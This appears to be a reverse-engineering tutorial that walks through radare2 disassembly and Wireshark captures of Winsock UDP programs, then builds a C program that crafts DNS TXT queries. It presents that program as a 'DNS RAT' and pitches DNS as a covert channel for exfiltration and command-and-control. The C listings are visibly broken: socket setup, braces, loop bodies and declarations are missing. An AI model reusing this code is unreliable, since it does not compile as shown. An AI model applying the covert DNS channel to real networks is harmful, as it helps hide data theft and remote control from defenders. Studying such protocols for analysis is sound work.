| 0x00401666 41b805000000 mov r8d, 5
| 0x0040166c ba00000000 mov edx, 0
| 0x00401671 4889c1 mov rcx, rax
| 0x00401674 e88f150000 call sym.memset ; void *memset(void *s, int c, size_t n)
| 0x00401679 488d857f0100. lea rax, [arg_17fh] ; 0x17f ; 383
| 0x00401680 488b8d880100. mov rcx, qword [arg_188h] ; [0x188:8]=-1 ; 392
| 0x00401687 48c744242800. mov qword [local_28h], 0
| 0x00401690 48c744242000. mov qword [local_20h_2], 0
| 0x00401699 41b900000000 mov r9d, 0
| 0x0040169f 41b805000000 mov r8d, 5
| 0x004016a5 4889c2 mov rdx, rax
| 0x004016a8 488b05316d00. mov rax, qword sym.imp.WS2_32.dll_recvfrom ; [0x4083e0:8]=0x874c reloc.WS2_32.dll_recvfrom ; "L\x87"
| 0x004016af ffd0 call rax
| 0x004016b1 898594010000 mov dword [arg_194h], eax ; [0x194:4]=-1 ; 404
| 0x004016b7 8b8594010000 mov eax, dword [arg_194h] ; [0x194:4]=-1 ; 404
| 0x004016bd 89c2 mov edx, eax
| 0x004016bf 488d0d582900. lea rcx, str.bytes_rec:__d ; 0x40401e ; "bytes rec: %d \n"
| 0x004016c6 e835150000 call sym.printf ; int printf(const char *format)
| 0x004016cb 488d857f0100. lea rax, [arg_17fh] ; 0x17f ; 383
| 0x004016d2 4889c2 mov rdx, rax
| 0x004016d5 488d0d522900. lea rcx, str.response:__s ; 0x40402e ; "response: %s"
| 0x004016dc e81f150000 call sym.printf ; int printf(const char *format)
| 0x004016e1 b800000000 mov eax, 0
| 0x004016e6 4881c4200200. add rsp, 0x220
| 0x004016ed 5d pop rbp
\ 0x004016ee c3 ret
This time we see that the vals for the socket call are different:
| 0x004015bb 41b811000000 mov r8d, 0x11 ; 17
| 0x004015c1 ba02000000 mov edx, 2
| 0x004015c6 b902000000 mov ecx, 2
| 0x004015cb 488b051e6e00. mov rax, qword sym.imp.WS2_32.dll_socket ; [0x4083f0:8]=0x8762 reloc.WS2_32.dll_socket ; "b\x87"
| 0x004015d2 ffd0 call rax
Then the initial buffer is sent straight to the remote machine:
| 0x0040160c 488d857f0100. lea rax, [arg_17fh] ; 0x17f ; 383
| 0x00401613 488b8d880100. mov rcx, qword [arg_188h] ; [0x188:8]=-1 ; 392
| 0x0040161a 8b959c010000 mov edx, dword [arg_19ch] ; [0x19c:4]=-1 ; 412
| 0x00401620 89542428 mov dword [local_28h], edx
| 0x00401624 488d55d0 lea rdx, [local_30h]
| 0x00401628 4889542420 mov qword [local_20h_2], rdx
| 0x0040162d 41b900000000 mov r9d, 0
| 0x00401633 41b805000000 mov r8d, 5
| 0x00401639 4889c2 mov rdx, rax
| 0x0040163c 488b05a56d00. mov rax, qword sym.imp.WS2_32.dll_sendto ; [0x4083e8:8]=0x8758 reloc.WS2_32.dll_sendto ; "X\x87"
| 0x00401643 ffd0 call rax
And then the same buffer we used for sent is zeroed with memset cause it will be used
| 0x00401671 4889c1 mov rcx, rax
| 0x00401674 e88f150000 call sym.memset ; void *memset(void *s, int c, size_t n)
| 0x00401679 488d857f0100. lea rax, [arg_17fh] ; 0x17f ; 383
| 0x00401680 488b8d880100. mov rcx, qword [arg_188h] ; [0x188:8]=-1 ; 392
| 0x00401687 48c744242800. mov qword [local_28h], 0
| 0x00401690 48c744242000. mov qword [local_20h_2], 0
| 0x00401699 41b900000000 mov r9d, 0
| 0x0040169f 41b805000000 mov r8d, 5
| 0x004016a5 4889c2 mov rdx, rax
| 0x004016a8 488b05316d00. mov rax, qword sym.imp.WS2_32.dll_recvfrom ; [0x4083e0:8]=0x7ffcc1793010
| 0x004016af ffd0 call rax
;-- rip:
| 0x004016b1 b 898594010000 mov dword [arg_194h], eax ; [0x194:4]=-1 ; 404
[0x004016b1]> afvd
arg arg_17fh = 0x0061fdff 0x0000050a21796568 hey!....
arg arg_180h = 0x0061fe00 0x000000050a217965 ey!.....
arg arg_181h = 0x0061fe01 0xd4000000050a2179 y!......
arg arg_182h = 0x0061fe02 0x00d4000000050a21 !.......
No mystery here really… when dealing with these things we basically need to know about: the socket (remote ip, port, protocol), buffers (what we are sending/expecting and where is it stored, then where/how is it used) and the lenght of those buffers, everything revolves around that.
… And on wireshark we should be seeing something like:
00000000 68 65 6c 6c 6f hello
00000000 68 65 79 21 0a hey!.
Again, no surprises
“Reversing” network protocols: DNS
But what if we just don’t want to send RAW data and we want to create or perhaps EMULATE/USE an already well known protocol?
Well, as we saw, what we sent appears on wireshark, if we sent raw hex, that raw hex is what we’ll see there on wireshark, so…yes if we craft our packet following the format of the desired protocol, that is what the other part will receive. We just need to place the right bytes on the right places.
So, now we’ll try to emulate a DNS packet, why DNS? Because it is very common, it has custom (hex) fields so the “request” is not just plain text as in HTTP, and also DNS traffic is allowed in the firewalls of many networks, so DNS can easily be used to exfiltrate data or receive commands from remote C&C servers, when reversing / studying malware, you’ll see DNS being used exactly for that
Of course we can read the RFC and some online documentation and learn about the DNS protocol, about the packet format and so on. But what if we don’t have that? What if we are dealing with a totally unknown custom network protocol. I would like to take that approach now just to show you how it can easily be done.
So in this case we can actually start a wireshark session on the sender/receiver machine and just lanch a random dns query, by using some program like nslookup or dig.
In this case, I setup a simple DNS server using bind9,
my forward dns zone looks like:
$TTL 604800
@ IN SOA primary.ab.local. root.primary.ab.local. (
6 ; Serial
604820 ; Refresh
86600 ; Retry
2419600 ; Expire
604600 ) ; Negative Cache TTL
;Name Server Information
@ IN NS primary.ab.local.
;IP address of Your Domain Name Server(DNS)
primary IN A
;Mail Server MX (Mail exchanger) Record
ab.local. IN MX 10 mail.ab.local.
;A Record for Host names
www IN A
mail IN A
;CNAME Record
ftp IN CNAME www.ab.local.
joe IN TXT "You can put any text"
mark IN TXT "1:secret message one"
karl IN TXT "2:200"
bb IN TXT "VGhpcyB0ZXh0IGlzIGJhc2U2NCBlbmNvZGVk="
xxx IN A
And when doing dig ab.local the following appears on wireshark:
00000000 ae c0 01 20 00 01 00 00 00 00 00 01 02 61 62 05 ... .... .....ab.
00000010 6c 6f 63 61 6c 00 00 01 00 01 00 00 29 10 00 00 local... ....)...
00000020 00 00 00 00 00 .....
00000000 ae c0 85 80 00 01 00 00 00 01 00 01 02 61 62 05 ........ .....ab.
00000010 6c 6f 63 61 6c 00 00 01 00 01 c0 0c 00 06 00 01 local... ........
00000020 00 09 39 b8 00 25 07 70 72 69 6d 61 72 79 c0 0c ..9..%.p rimary..
00000030 04 72 6f 6f 74 c0 26 00 00 00 06 00 09 3a 94 00 .root.&. .....:..
00000040 01 52 48 00 24 eb 90 00 09 39 b8 00 00 29 10 00 .RH.$... .9...)..
00000050 00 00 00 00 00 00 ......
Wireshark has a cool option for printing the packet in a C array:
char peer0_0[] = { /* Packet 522 */
0xae, 0xc0, 0x01, 0x20, 0x00, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x02, 0x61, 0x62, 0x05,
0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x00, 0x00, 0x01,
0x00, 0x01, 0x00, 0x00, 0x29, 0x10, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00 };
char peer1_0[] = { /* Packet 523 */
0xae, 0xc0, 0x85, 0x80, 0x00, 0x01, 0x00, 0x00,
0x00, 0x01, 0x00, 0x01, 0x02, 0x61, 0x62, 0x05,
0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x00, 0x00, 0x01,
0x00, 0x01, 0xc0, 0x0c, 0x00, 0x06, 0x00, 0x01,
0x00, 0x09, 0x39, 0xb8, 0x00, 0x25, 0x07, 0x70,
0x72, 0x69, 0x6d, 0x61, 0x72, 0x79, 0xc0, 0x0c,
0x04, 0x72, 0x6f, 0x6f, 0x74, 0xc0, 0x26, 0x00,
0x00, 0x00, 0x06, 0x00, 0x09, 0x3a, 0x94, 0x00,
0x01, 0x52, 0x48, 0x00, 0x24, 0xeb, 0x90, 0x00,
0x09, 0x39, 0xb8, 0x00, 0x00, 0x29, 0x10, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
And yes, as you can easily figure out, we can just copy and paste our request packet in a C program and then send it “replicating” the query. Of course can MODIFY the packet to send whatever we want to send (changing parameters, changing the query etc), this approach is followed when dealing with exploits / fuzzing
The following program repliactes a simple similar DNS query:
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#include <conio.h>
#pragma comment(lib, "ws2_32")
#define BUFLEN 65536
int main(){
char buffer[] = {
0x00, 0x05, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x03, 0x77, 0x77, 0x77,
0x02, 0x61, 0x62, 0x05, 0x6c, 0x6f, 0x63, 0x61,
0x6c, 0x00, 0x00, 0x01, 0x00, 0x01 };
char buf[BUFLEN];
SOCKET sock;
SOCKADDR_IN ReceiverAddr , SrcInfo;
int slen = sizeof(ReceiverAddr) ;
int port = 53;
int bytes_rec=0;
if (WSAStartup(MAKEWORD(2,2),&wsa) != 0){
printf("Failed. Error Code : %d",WSAGetLastError());
return 1;
printf("Could not create socket : %d" , WSAGetLastError());
ReceiverAddr.sin_family = AF_INET;
ReceiverAddr.sin_port = htons(port);
ReceiverAddr.sin_addr.s_addr = inet_addr("");
if (sendto(sock, &buffer , sizeof(buffer) , 0, (struct SOCKADDR *) &ReceiverAddr, slen) == SOCKET_ERROR){
printf("sendto() failed with error code : %d ", WSAGetLastError());
printf("packet sent\n");
bytes_rec=recvfrom(sock, &buf, BUFLEN, 0,0,0);
if(bytes_rec > 0 ){
printf("response: \n");
for(int i = 0; i < bytes_rec; i++){
for(int i = 0; i < bytes_rec; i++){
return 0;
Again, the code is no mystery: A couple of for loops have been added to show the response (chars and bytes) we get from the server. As you will see, what the server sends in return has his own format also, it is not plan text like in HTTP, if we want to do something with the response we’ll need to be able to parse it!
/ (fcn) sym.main 782
| ; CALL XREF from 0x004013c2 (sym.__tmainCRTStartup)
| 0x00401550 55 push rbp
| 0x00401551 b840020100 mov eax, 0x10240
| 0x00401556 e8c5170000 call fcn.00402d20
| 0x0040155b 4829c4 sub rsp, rax
| 0x0040155e 488dac248000. lea rbp, [arg_80h] ; 0x80 ; 128
| 0x00401566 e8e5030000 call sym.__main
| 0x0040156b c68580010100. mov byte [arg_10180h], 0 ; [0x10180:1]=0
| 0x00401572 c68581010100. mov byte [arg_10181h], 5 ; [0x10181:1]=0
| 0x00401579 c68582010100. mov byte [arg_10182h], 1 ; [0x10182:1]=0
| 0x00401580 c68583010100. mov byte [arg_10183h], 0 ; [0x10183:1]=0
| 0x00401587 c68584010100. mov byte [arg_10184h], 0 ; [0x10184:1]=0
| 0x0040158e c68585010100. mov byte [arg_10185h], 1 ; [0x10185:1]=0
| 0x00401595 c68586010100. mov byte [arg_10186h], 0 ; [0x10186:1]=0
| 0x0040159c c68587010100. mov byte [arg_10187h], 0 ; [0x10187:1]=0
| 0x004015a3 c68588010100. mov byte [arg_10188h], 0 ; [0x10188:1]=0
| 0x004015aa c68589010100. mov byte [arg_10189h], 0 ; [0x10189:1]=0
| 0x004015b1 c6858a010100. mov byte [arg_1018ah], 0 ; [0x1018a:1]=0
| 0x004015b8 c6858b010100. mov byte [arg_1018bh], 0 ; [0x1018b:1]=0
| 0x004015bf c6858c010100. mov byte [arg_1018ch], 3 ; [0x1018c:1]=0
| 0x004015c6 c6858d010100. mov byte [arg_1018dh], 0x77 ; 'w' ; 119
| 0x004015cd c6858e010100. mov byte [arg_1018eh], 0x77 ; 'w' ; 119
| 0x004015d4 c6858f010100. mov byte [arg_1018fh], 0x77 ; 'w' ; 119
| 0x004015db c68590010100. mov byte [arg_10190h], 2 ; [0x10190:1]=0
| 0x004015e2 c68591010100. mov byte [arg_10191h], 0x61 ; 'a' ; 97
| 0x004015e9 c68592010100. mov byte [arg_10192h], 0x62 ; 'b' ; 98
| 0x004015f0 c68593010100. mov byte [arg_10193h], 5 ; [0x10193:1]=0
| 0x004015f7 c68594010100. mov byte [arg_10194h], 0x6c ; 'l' ; 108
| 0x004015fe c68595010100. mov byte [arg_10195h], 0x6f ; 'o' ; 111
| 0x00401605 c68596010100. mov byte [arg_10196h], 0x63 ; 'c' ; 99
| 0x0040160c c68597010100. mov byte [arg_10197h], 0x61 ; 'a' ; 97
| 0x00401613 c68598010100. mov byte [arg_10198h], 0x6c ; 'l' ; 108
| 0x0040161a c68599010100. mov byte [arg_10199h], 0 ; [0x10199:1]=0
| 0x00401621 c6859a010100. mov byte [arg_1019ah], 0 ; [0x1019a:1]=0
| 0x00401628 c6859b010100. mov byte [arg_1019bh], 1 ; [0x1019b:1]=0
| 0x0040162f c6859c010100. mov byte [arg_1019ch], 0 ; [0x1019c:1]=0
| 0x00401636 c6859d010100. mov byte [arg_1019dh], 1 ; [0x1019d:1]=0
| 0x0040163d c785b4010100. mov dword [arg_101b4h], 0x10 ; 16
| 0x00401647 c785b0010100. mov dword [arg_101b0h], 0x35 ; '5' ; 53
| 0x00401651 c785ac010100. mov dword [arg_101ach], 0 ; [0x101ac:4]=0
| 0x0040165b 488d45e0 lea rax, [local_20h]
| 0x0040165f 4889c2 mov rdx, rax
| 0x00401662 b902020000 mov ecx, 0x202 ; 514
| 0x00401667 488b057a6d00. mov rax, qword sym.imp.WS2_32.dll_WSAStartup ; [0x4083e8:8]=0x8764 reloc.WS2_32.dll_WSAStartup ; "d\x87"
| 0x0040166e ffd0 call rax
| 0x00401670 85c0 test eax, eax
| ,=< 0x00401672 7421 je 0x401695
| | 0x00401674 488b05656d00. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x4083e0:8]=0x8752 reloc.WS2_32.dll_WSAGetLastError ; "R\x87"
| | 0x0040167b ffd0 call rax
| | 0x0040167d 89c2 mov edx, eax
| | 0x0040167f 488d0d7a2900. lea rcx, str.Failed._Error_Code_:__d ; section..rdata ; 0x404000 ; "Failed. Error Code : %d"
| | 0x00401686 e805170000 call sym.printf ; int printf(const char *format)
| | 0x0040168b b801000000 mov eax, 1
| ,==< 0x00401690 e9c0010000 jmp 0x401855
| || ; CODE XREF from 0x00401672 (sym.main)
| |`-> 0x00401695 41b811000000 mov r8d, 0x11 ; 17
| | 0x0040169b ba02000000 mov edx, 2
| | 0x004016a0 b902000000 mov ecx, 2
| | 0x004016a5 488b05646d00. mov rax, qword sym.imp.WS2_32.dll_socket ; [0x408410:8]=0x879c reloc.WS2_32.dll_socket
| | 0x004016ac ffd0 call rax
| | 0x004016ae 488985a00101. mov qword [arg_101a0h], rax ; [0x101a0:8]=0
| | 0x004016b5 4883bda00101. cmp qword [arg_101a0h], 0xffffffffffffffff
| |,=< 0x004016bd 7517 jne 0x4016d6
| || 0x004016bf 488b051a6d00. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x4083e0:8]=0x8752 reloc.WS2_32.dll_WSAGetLastError ; "R\x87"
| || 0x004016c6 ffd0 call rax
| || 0x004016c8 89c2 mov edx, eax
| || 0x004016ca 488d0d472900. lea rcx, str.Could_not_create_socket_:__d ; 0x404018 ; "Could not create socket : %d"
| || 0x004016d1 e8ba160000 call sym.printf ; int printf(const char *format)
| || ; CODE XREF from 0x004016bd (sym.main)
| |`-> 0x004016d6 66c745d00200 mov word [local_30h], 2
| | 0x004016dc 8b85b0010100 mov eax, dword [arg_101b0h] ; [0x101b0:4]=0
| | 0x004016e2 0fb7c0 movzx eax, ax
| | 0x004016e5 89c1 mov ecx, eax
| | 0x004016e7 488b05026d00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x4083f0:8]=0x8772 reloc.WS2_32.dll_htons ; "r\x87"
| | 0x004016ee ffd0 call rax
| | 0x004016f0 668945d2 mov word [local_2eh], ax
| | 0x004016f4 488d0d3a2900. lea rcx, str. ; 0x404035 ; ""
| | 0x004016fb 488b05f66c00. mov rax, qword sym.imp.WS2_32.dll_inet_addr ; [0x4083f8:8]=0x877a reloc.WS2_32.dll_inet_addr ; "z\x87"
| | 0x00401702 ffd0 call rax
| | 0x00401704 8945d4 mov dword [local_2ch], eax
| | 0x00401707 488d85800101. lea rax, [arg_10180h] ; 0x10180
| | 0x0040170e 488b8da00101. mov rcx, qword [arg_101a0h] ; [0x101a0:8]=0
| | 0x00401715 8b95b4010100 mov edx, dword [arg_101b4h] ; [0x101b4:4]=0
| | 0x0040171b 89542428 mov dword [arg_28h], edx
| | 0x0040171f 488d55d0 lea rdx, [local_30h]
| | 0x00401723 4889542420 mov qword [arg_20h], rdx
| | 0x00401728 41b900000000 mov r9d, 0
| | 0x0040172e 41b81e000000 mov r8d, 0x1e ; 30
| | 0x00401734 4889c2 mov rdx, rax
| | 0x00401737 488b05ca6c00. mov rax, qword sym.imp.WS2_32.dll_sendto ; [0x408408:8]=0x8792 reloc.WS2_32.dll_sendto
| | 0x0040173e ffd0 call rax
| | 0x00401740 83f8ff cmp eax, 0xffffffffffffffff
| |,=< 0x00401743 7521 jne 0x401766
| || 0x00401745 488b05946c00. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x4083e0:8]=0x8752 reloc.WS2_32.dll_WSAGetLastError ; "R\x87"
| || 0x0040174c ffd0 call rax
| || 0x0040174e 89c2 mov edx, eax
| || 0x00401750 488d0df12800. lea rcx, str.sendto___failed_with_error_code_:__d ; 0x404048 ; "sendto() failed with error code : %d "
| || 0x00401757 e834160000 call sym.printf ; int printf(const char *format)
| || 0x0040175c b901000000 mov ecx, 1
| || 0x00401761 e85a160000 call sym.exit
| || ; CODE XREF from 0x00401743 (sym.main)
| |`-> 0x00401766 488d0d012900. lea rcx, str.packet_sent ; 0x40406e ; "packet sent"
| | 0x0040176d e80e160000 call sym.puts ; int puts(const char *s)
| | 0x00401772 488d85800100. lea rax, [arg_180h] ; 0x180 ; 384
| | 0x00401779 488b8da00101. mov rcx, qword [arg_101a0h] ; [0x101a0:8]=0
| | 0x00401780 48c744242800. mov qword [arg_28h], 0
| | 0x00401789 48c744242000. mov qword [arg_20h], 0
| | 0x00401792 41b900000000 mov r9d, 0
| | 0x00401798 41b800000100 mov r8d, 0x10000
| | 0x0040179e 4889c2 mov rdx, rax
| | 0x004017a1 488b05586c00. mov rax, qword sym.imp.WS2_32.dll_recvfrom ; [0x408400:8]=0x8786 reloc.WS2_32.dll_recvfrom
| | 0x004017a8 ffd0 call rax
| | 0x004017aa 8985ac010100 mov dword [arg_101ach], eax ; [0x101ac:4]=0
| | 0x004017b0 83bdac010100. cmp dword [arg_101ach], 0
| |,=< 0x004017b7 0f8e93000000 jle 0x401850
| || 0x004017bd 488d0db62800. lea rcx, str.response: ; 0x40407a ; "response: "
| || 0x004017c4 e8b7150000 call sym.puts ; int puts(const char *s)
| || 0x004017c9 c785bc010100. mov dword [arg_101bch], 0 ; [0x101bc:4]=0
| ,===< 0x004017d3 eb28 jmp 0x4017fd
| .----> 0x004017d5 8b85bc010100 mov eax, dword [arg_101bch] ; [0x101bc:4]=0
| :||| 0x004017db 4898 cdqe
| :||| 0x004017dd 0fb684058001. movzx eax, byte [rbp + rax + 0x180] ; [0x180:1]=255 ; 384
| :||| 0x004017e5 0fbec0 movsx eax, al
| :||| 0x004017e8 89c2 mov edx, eax
| :||| 0x004017ea 488d0d942800. lea rcx, [0x00404085] ; "%x"
| :||| 0x004017f1 e89a150000 call sym.printf ; int printf(const char *format)
| :||| 0x004017f6 8385bc010100. add dword [arg_101bch], 1
| :||| ; CODE XREF from 0x004017d3 (sym.main)
| :`---> 0x004017fd 8b85bc010100 mov eax, dword [arg_101bch] ; [0x101bc:4]=0
| : || 0x00401803 3b85ac010100 cmp eax, dword [arg_101ach] ; [0x101ac:4]=0
| `====< 0x00401809 7cca jl 0x4017d5
| || 0x0040180b b90a000000 mov ecx, 0xa
| || 0x00401810 e873150000 call sym.putchar ; int putchar(int c)
| || 0x00401815 c785b8010100. mov dword [arg_101b8h], 0 ; [0x101b8:4]=0
| ,===< 0x0040181f eb21 jmp 0x401842
| ||| ; CODE XREF from 0x0040184e (sym.main)
| .----> 0x00401821 8b85b8010100 mov eax, dword [arg_101b8h] ; [0x101b8:4]=0
| :||| 0x00401827 4898 cdqe
| :||| 0x00401829 0fb684058001. movzx eax, byte [rbp + rax + 0x180] ; [0x180:1]=255 ; 384
| :||| 0x00401831 0fbec0 movsx eax, al
| :||| 0x00401834 89c1 mov ecx, eax
| :||| 0x00401836 e84d150000 call sym.putchar ; int putchar(int c)
| :||| 0x0040183b 8385b8010100. add dword [arg_101b8h], 1
| :||| ; CODE XREF from 0x0040181f (sym.main)
| :`---> 0x00401842 8b85b8010100 mov eax, dword [arg_101b8h] ; [0x101b8:4]=0
| : || 0x00401848 3b85ac010100 cmp eax, dword [arg_101ach] ; [0x101ac:4]=0
| `====< 0x0040184e 7cd1 jl 0x401821
| || ; CODE XREF from 0x004017b7 (sym.main)
| |`-> 0x00401850 b800000000 mov eax, 0
| | ; CODE XREF from 0x00401690 (sym.main)
| `--> 0x00401855 4881c4400201. add rsp, 0x10240
| 0x0040185c 5d pop rbp
\ 0x0040185d c3 ret
I won’t go step by step here as everything looks familiar, just see that the following is received as a response via the buffer:
[0x004017aa]> pxw @ 0x0060fde0
0x0060fde0 0x80850500 0x01000100 0x01000100 0x77777703 .............www
0x0060fdf0 0x05626102 0x61636f6c 0x0100006c 0x0cc00100 .ab.local.......
0x0060fe00 0x01000100 0x803a0900 0xa8c00400 0x10c03c00 ......:......<..
0x0060fe10 0x01000200 0x803a0900 0x70070a00 0x616d6972 ......:....prima
0x0060fe20 0x10c07972 0x01003ac0 0x09000100 0x0400803a ry...:......:...
0x0060fe30 0x3200a8c0 0x00000000 0x00000000 0x00000000 ...2............
We can correctly identify the response there, we’ll just need to correctly parse it if we want to use it:
Custom DNS queries in C
So, DNS can easily be used inside any network as a covert communication channel, we can craft custom packets and send/get stuff encoded inside the domain name we are querying from, we can for example, ask for some subdomain with some weird long name and get/send info using that.
But as you are thinking, we’ll need to be able to send custom strings, strings of variable size, so working on a fixed size buffer editing the right bytes won’t be possible (unless we are going to send fixed size chunks but that is not very elegant and we want to learn)
What we’ll need to do know is packet crafting as we’ll need to create our own custom DNS packet and send it right away to the remote server.
Sooo, take a seat grab some coffee and take a look at the following program, it creates a custom DNS packet asking for a TXT register on a user defined domain.
Two concepts are fundamental here:
- We are creating different structs for different packet parts and we define the size of each field to correctly match the format and don’t “break” the packet structure.
- We are concatenating each of the parts to create a packet as we need everything to be “together” in the same buffer. We cannot create one single struct with everything on cause our string is of variable size.
- 65536 is the max size of a udp packet
And here’s the code:
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#include <conio.h>
#pragma comment(lib, "ws2_32")
#define BUFLEN 65536 //max size of packet
// first we define the DNS packet for query:
struct dns_header
unsigned short id; // identification number
unsigned char rd :1; // recursion desired
unsigned char tc :1; // truncated message
unsigned char aa :1; // authoritive answer
unsigned char opcode :4; // purpose of message
unsigned char qr :1; // query/response flag
unsigned char rcode :4; // response code
unsigned char cd :1; // checking disabled
unsigned char ad :1; // authenticated data
unsigned char z :1; // its z! reserved
unsigned char ra :1; // recursion available
unsigned short q_count; // number of question entries
unsigned short ans_count; // number of answer entries
unsigned short auth_count; // number of authority entries
unsigned short add_count; // number of resource entries
struct question{
unsigned short type;
unsigned short tclass;
typedef struct
unsigned char *name;
struct question *ques;
} query;
// in DNS www.web.com goes like 3WWW3WEB3COM (3, 3 int not ascii, is the size)
void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
int lock = 0 , i;
for(i = 0 ; i < strlen((char*)host) ; i++)
*dns++ = i-lock;
lock++; //or lock=i+1;
int main()
unsigned char buf[65536],*qname,*reader;
char host[100]; // DNS QUERY
printf("DNS RAT UP AND RUNNING \n");
printf("Enter Hostname to Lookup : ");
scanf("%s" , host);
struct question *qinfo = NULL;
struct dns_header *dns = NULL;
dns = (struct dns_header *)&buf;
dns->id = (unsigned short) htons(getpid());
dns->qr = 0; //This is a query
dns->opcode = 0; //This is a standard query
dns->aa = 0; //Not Authoritative
dns->tc = 0; //This message is not truncated
dns->rd = 1; //Recursion Desired
dns->ra = 0; //Recursion not available! hey we dont have it (lol)
dns->z = 0;
dns->ad = 0;
dns->cd = 0;
dns->rcode = 0;
dns->q_count = htons(1); //we have only 1 question
dns->ans_count = 0;
dns->auth_count = 0;
dns->add_count = 0;
qname =(unsigned char*)&buf[sizeof(struct dns_header)];
ChangetoDnsNameFormat(qname , host); // SUBSTITUTE '.' BY LENGTH
qinfo =(struct question*)&buf[sizeof(struct dns_header) + (strlen((const char*)qname) + 1)]; //we are just concatenating data
qinfo->type = htons(16); // 1 == 'A', 16 == 'TXT', we ask for TXT registers
qinfo->tclass = htons(1); // 1 = INTERNET
SOCKET sock;
SOCKADDR_IN ReceiverAddr , SrcInfo;
int slen = sizeof(ReceiverAddr) ;
int port = 53;
if (WSAStartup(MAKEWORD(2,2),&wsa) != 0){
printf("Failed. Error Code : %d",WSAGetLastError());
return 1;
printf("1 - WINSOCK INITIALIZED. \n");
printf("Could not create socket : %d" , WSAGetLastError());
printf("2 - WINSOCK SOCKET CREATED. \n");
ReceiverAddr.sin_family = AF_INET;
ReceiverAddr.sin_port = htons(port);
ReceiverAddr.sin_addr.s_addr = inet_addr("");
if (sendto(sock,(char*)buf,sizeof(struct dns_header) + (strlen((const char*)qname)+1) + sizeof(struct question) , 0 , (struct SOCKADDR *) &ReceiverAddr, slen) == SOCKET_ERROR){
printf("sendto() failed with error code : %d ", WSAGetLastError());
printf("3 - SENDTO() OK, packet sent\n");
if (recvfrom(sock, &buf, BUFLEN, 0,0,0) == SOCKET_ERROR){
printf("error recving : %d" , WSAGetLastError());
printf("4 - RECVFROM() OK, packet received \n"); // joe.ab.local
reader = &buf[sizeof(struct dns_header) + (strlen((const char*)qname)+1) + sizeof(struct question)];
if(dns->ans_count > 0){
int txt_position = 30 + strlen(host)-1;
int txt_response_len = buf[txt_position];
printf("BUF: %d \n",txt_response_len);
dns = (struct dns_header*) buf;
// just printing the response packet char by char, we can either do printf()
for(int i=txt_position+1; i < 1+txt_position+txt_response_len; i++){
printf("WSACLEANUP() OK exiting \n");
return 0;
Now to the disasm:
[0x00401634]> pdf
/ (fcn) sym.main 1203
| sym.main (int arg_180h, int arg_1f0h, int arg_101f0h, int arg_101f4h, int arg_101f8h, int arg_10200h, int arg_10208h, int arg_1020ch, int arg_10210h, int arg_10218h, int arg_10220h, int arg_1022ch, int arg_20h, int arg_28h, int arg_80h);
| ; arg int arg_20h @ rsp+0x20
| ; arg int arg_28h @ rsp+0x28
| ; arg int arg_80h @ rsp+0x80
| ; CALL XREF from 0x004013c2 (sym.__tmainCRTStartup)
| 0x00401634 55 push rbp
| 0x00401635 b8b0020100 mov eax, 0x102b0
| 0x0040163a e871190000 call fcn.00402fb0
| 0x0040163f 4829c4 sub rsp, rax
| 0x00401642 488dac248000. lea rbp, [arg_80h] ; 0x80 ; 128
| 0x0040164a e891050000 call sym.__main
| 0x0040164f 488d0daa3900. lea rcx, str.DNS_RAT_UP_AND_RUNNING ; section..rdata ; 0x405000 ; "DNS RAT UP AND RUNNING "
| 0x00401656 e8bd190000 call sym.puts ; int puts(const char *s)
| 0x0040165b 488d0db63900. lea rcx, str.Enter_Hostname_to_Lookup_: ; 0x405018 ; "Enter Hostname to Lookup : "
| 0x00401662 e8c1190000 call sym.printf ; int printf(const char *format)
| 0x00401667 488d85800100. lea rax, [arg_180h] ; 0x180 ; 384
| 0x0040166e 4889c2 mov rdx, rax
| 0x00401671 488d0dbc3900. lea rcx, [0x00405034] ; "%s"
| 0x00401678 e893190000 call sym.scanf ; int scanf(const char *format)
| 0x0040167d 48c785200201. mov qword [arg_10220h], 0 ; [0x10220:8]=0
| 0x00401688 48c785180201. mov qword [arg_10218h], 0 ; [0x10218:8]=0
| 0x00401693 488d85f00100. lea rax, [arg_1f0h] ; 0x1f0 ; 496
| 0x0040169a 488985180201. mov qword [arg_10218h], rax ; [0x10218:8]=0
| 0x004016a1 e8da190000 call sym.getpid ; int getpid(void)
| 0x004016a6 0fb7c0 movzx eax, ax
| 0x004016a9 89c1 mov ecx, eax
| 0x004016ab 488b056e7d00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409420:8]=0x97c2 reloc.WS2_32.dll_htons
| 0x004016b2 ffd0 call rax
| 0x004016b4 89c2 mov edx, eax
| 0x004016b6 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x004016bd 668910 mov word [rax], dx
| 0x004016c0 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x004016c7 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| 0x004016cb 83e27f and edx, 0x7f
| 0x004016ce 885002 mov byte [rax + 2], dl
| 0x004016d1 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x004016d8 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| 0x004016dc 83e287 and edx, 0xffffff87
| 0x004016df 885002 mov byte [rax + 2], dl
| 0x004016e2 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x004016e9 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| 0x004016ed 83e2fb and edx, 0xfffffffb
| 0x004016f0 885002 mov byte [rax + 2], dl
| 0x004016f3 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x004016fa 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| 0x004016fe 83e2fd and edx, 0xfffffffd
| 0x00401701 885002 mov byte [rax + 2], dl
| 0x00401704 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
